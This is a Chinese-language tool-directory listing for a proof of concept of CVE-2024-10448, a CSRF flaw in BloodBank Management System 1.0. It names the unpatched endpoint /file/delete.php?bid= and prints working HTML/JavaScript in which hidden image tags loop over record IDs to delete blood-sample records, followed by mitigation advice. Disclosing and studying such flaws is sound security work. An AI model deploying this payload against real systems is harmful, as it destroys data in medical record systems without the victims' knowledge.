Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-10448 — 血库 CSRF 攻击 POC | Kitploit
工具/GitHubGitHub/bevennyamande/cve-2024-10448
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubbevennyamande/cve-2024-10448

CVE-2024-10448

血库 CSRF 攻击 POC

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

受影响版本:

  • 血液银行管理系统 (BloodBank Management System):1.0

漏洞信息:

  • 漏洞类型: 跨站请求伪造 (CSRF)
  • 严重性: 高
  • 状态: 未修补

脆弱端点:

  • 路径: /file/delete.php?bid=

漏洞描述:

在 BloodBank 管理系统的血液请求功能中发现了一个跨站请求伪造 (CSRF) 漏洞。当向路径 /file/delete.php?bid= 发送 delete 请求时,该缺陷允许 bid 参数选择要删除的记录。然而,bids 是动态的,取决于添加的血液样本数量,因此为了使请求成功,我在循环中使用了 JavaScript 生成的图像标签。

成功利用可导致在受害者不知情的情况下执行未经授权的操作,例如删除数据。此外,访问包含恶意负载的网站也可能触发此漏洞。


概念验证 (PoC):

以下是CSRF POC 攻击的示例,该攻击通过 bid 参数删除“可用血液样本”,将文件托管在攻击者控制的域上(本例中我使用的是 localhost):

root@kitploit:~

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC</title>
</head>
<body>
    <h2>CSRF Proof of Concept for Deleting Blood Bank Records</h2>
    <script>
        // Define the target URL where the Blood Bank System is hosted
        const targetUrl = "http://localhost/bloodbank/file/delete.php";

        // Loop through possible bid values (0 to 20) can be increased to as much as possible :)
        for (let bid = 0; bid <= 20; bid++) {
            // Create an image element for each bid value to send the GET request
            let img = document.createElement("img");
            img.src = `${targetUrl}?bid=${bid}`;
            img.style.display = "none";  // Hide the image from view
            document.body.appendChild(img);
        }
    </script>
</body>
</html>


视频 POC

  • 视频链接

影响:

  • 数据篡改: 攻击者可能修改向用户显示的内容。
  • 声誉损害: 用户可能因恶意行为而失去对系统的信任。

缓解建议:

  1. 使用 CSRF 令牌: 实施机制以防止跨域访问,或在请求中加入 csrf 令牌,同时避免使用 GET 请求执行状态更改操作。
下载工具